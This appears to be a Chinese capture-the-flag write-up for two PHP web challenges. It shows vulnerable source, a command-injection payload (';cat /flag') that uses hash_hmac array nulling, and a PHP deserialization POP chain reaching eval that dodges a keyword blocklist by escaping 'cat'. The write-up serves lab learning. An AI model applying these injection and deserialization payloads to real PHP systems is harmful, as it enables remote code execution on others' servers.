web huluwa 音频末尾有源码
1 2 3 4 5 6 7 8 9 10 11 12 if (empty ($_POST ['Huluxiaojinggang' ]) || empty ($_POST ['Shejing' ])) { die ('1' ); } $secret = getenv ("secret" );if (isset ($_POST ['yeye' ])) $secret = hash_hmac ('sha256' , $_POST ['yeye' ], $secret ); $qwer = hash_hmac ('sha256' , $_POST ['Shejing' ], $secret );echo $qwer . '<br>' ;if ($qwer !== $_POST ['Huluxiaojinggang' ]) { die ('2' ); } echo exec ("nc" . $_POST ['Shejing' ]);
利用数组报错使得secret=null然后就可以利用函数获得$qwer里面的内容。
所以最终payload:
1 yeye[]=1&Huluxiaojinggang=c7e4698914f5d06bf59a9b3b081046f261170deb991ca94e9c2ddfafe928560a&Shejing=;cat /flag
php-levels 首先采用php伪协议读取了hint.php文件里面内容
事实上这个能出来纯属巧合,原本能绕过的payload应当是
然后进行base64解码得到了源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 <?php error_reporting (0 );class mouse { public $rice ; function __isset ($n ) { $this ->rice->nothing (); } } class dog { public $a ; public $b ; public $c ; function __wakeup ( ) { $this ->a = 'chance?' ; } function __destruct ( ) { $this ->b = $this ->c; die ($this ->a); } } class ct { public $fish ; function __toString ( ) { if (isset ($this ->fish->d)) { echo 'you wrong' ; } } } class get { public $cmd ; function __call ($name ,$no ) { eval ($this ->cmd); } } $pop = $_GET ['pop' ];if (!preg_match ('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i' ,$pop )){ echo "you will get flag" .'</br>' ; unserialize ($pop ); } else { die ("Try again!" ); }
是一个php链条
从dog->ct->mouse->get
构造payload绕过正则
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 <?php error_reporting (0 );class mouse { public $rice ; function __construct ( ) { $this ->rice = new get; } } class dog { public $a ; public $b ; public $c ; function __construct ( ) { $this ->a = 'chance?' ; $this ->b = &$this ->a; $this ->c = new ct; } } class ct { public $fish ; function __construct ( ) { $this ->fish = new mouse; } } class get { public $cmd ; function __construct ( ) { $this ->cmd = 'print(`c\at /realflag/you_want_flag.php`);' ; } } $b = new dog;var_dump (serialize ($b ));
1 flag{c91d38f0-86ea-4f36-b4d8-5e6a716ea8fe}
另外一种构造是
1 2 $this ->cmd = '?><?=`nl /realflag/you_want_flag.php`;' ;
用这?><?替代了echo的作用